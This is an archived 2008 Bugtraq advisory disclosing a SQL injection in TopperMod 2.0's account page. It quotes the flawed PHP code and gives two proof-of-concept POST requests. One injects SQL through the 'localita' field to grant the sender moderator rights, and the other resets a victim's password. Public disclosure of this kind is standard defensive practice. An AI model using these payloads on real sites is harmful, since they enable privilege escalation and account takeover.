lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080327143526.15583.qmail@securityfocus.com>
Date: 27 Mar 2008 14:35:26 -0000
From: r57blg@...il.com
To: bugtraq@...urityfocus.com
Subject: TopperMod 2.0 Remote SQL Injection Vulnerability

# Author:	__GiReX__
# mySite:	www.r57shell.in

# CMS: 		TopperMod v2.0
# Site:		www.wikipediatr.com

# Bug: 		SQL Injection

# Type:	        1 - Priviledge Escalation (from user to mod)
		2 - Remote user password change

# File: 	/account/index.php
# Var :		$localita

# Need:		magic_quotes_gpc = Off
		You must be logged in


# Vuln Code: /account/index.php: 	

	case "edituser_save":
        ...


	$localita=$_POST['localita']; 
	...

	if ($localita!="") { 
		if (eregi("^[a-zA-Z0-9]",$localita)) {
			$localita=substr(htmlentities(htmlspecialchars($localita), ENT_QUOTES),0,20);
		}
	}

# And if our $_POST['localita'] does not begin with a char or a number?
# Input not sanizated
	
	...
	$res=dbquery("UPDATE ".PREFISSO."_utenti SET  email='$email', localita='$localita', sito='$sito', 
		     tema='$tema_user', time_zone='$time_zone'  $pass  
		     WHERE user_id='$user_id' "); 

# Vulnerable query :D

	

# PoC 1:

	POST  /[PATH]/mod.php?mod=account HTTP/1.1
	Host: [TARGET]
	...headers...

	email=someone@...ewhere.dot&localita=@', permessi='1&go=edituser_save&user_id=[YOUR_USER_ID]

# PoC 2:

	POST  /[PATH]/mod.php?mod=account HTTP/1.1
	Host: [TARGET]
	...headers...

	email=someone@...ewhere.dot&localita=@', password='[PASSWORD]&go=edituser_save&user_id=[VICTIM_USER_ID]



# Note: [PASSWORD] must be the md5 of the md5 of the wanted password, you must forget in the content the end quote
# We can also try to get admin hash trought sql subqueries but the password is crypted into md5 2 times
# and Admins don't use cookies in this CMS...

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ